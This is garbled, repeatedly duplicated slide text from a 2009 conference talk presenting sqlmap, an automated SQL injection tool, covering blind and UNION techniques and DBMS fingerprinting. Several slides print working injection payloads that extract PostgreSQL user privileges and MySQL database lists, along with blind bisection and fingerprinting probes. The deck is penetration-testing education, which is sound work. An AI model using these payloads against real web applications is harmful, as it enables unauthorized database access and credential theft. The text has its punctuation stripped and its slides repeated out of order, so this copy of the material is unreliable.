UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38

Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." (Richard Stallman)

Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection in SQL clauses other than WHERE
The time-based blind SQL injection technique
...but I am working on these and others.

Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area

Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com

References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A G
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)

Questions?
Thanks for your attention
Intercon III London ndash January 9 2009 3
SQL what (12) From the OWASP Testing Guide
ldquoSQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commandsrdquo
There are plenty of resources on the Net about SQL injection concept it is a high-risk web application security flaw
A long list of resources can be found on my delicious profile httpdeliciouscominquissqlinjection
I keep it updated with stuff I consider valuable
A wise man once told me
ldquoAn image is worth thousands wordsrdquo
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 4
SQL what (22)
Source httpxkcdcom327
Intercon III London ndash January 9 2009 5
All right tons of resources and I am still presenting about SQL injection why
Because
New techniques have been released in the last year
Some aspects have been over-looked in the past
It is fun
State of art
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London – January 9 2009 35
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.
Give me a SQL shell
Intercon III London – January 9 2009 36
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatype, etc.
There is an option to dump the whole back-end DBMS.
Intercon III London – January 9 2009 37
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both the command line and/or a configuration file.
Options are documented in the user's manual with examples.
Intercon III London – January 9 2009 38
Third demo
"I get tons of uninteresting mail and system announcements about babies born, etc. At least a demo MIGHT have been interesting." – Richard Stallman
Intercon III London – January 9 2009 39
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
But I am working on these and others.
Intercon III London – January 9 2009 40
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
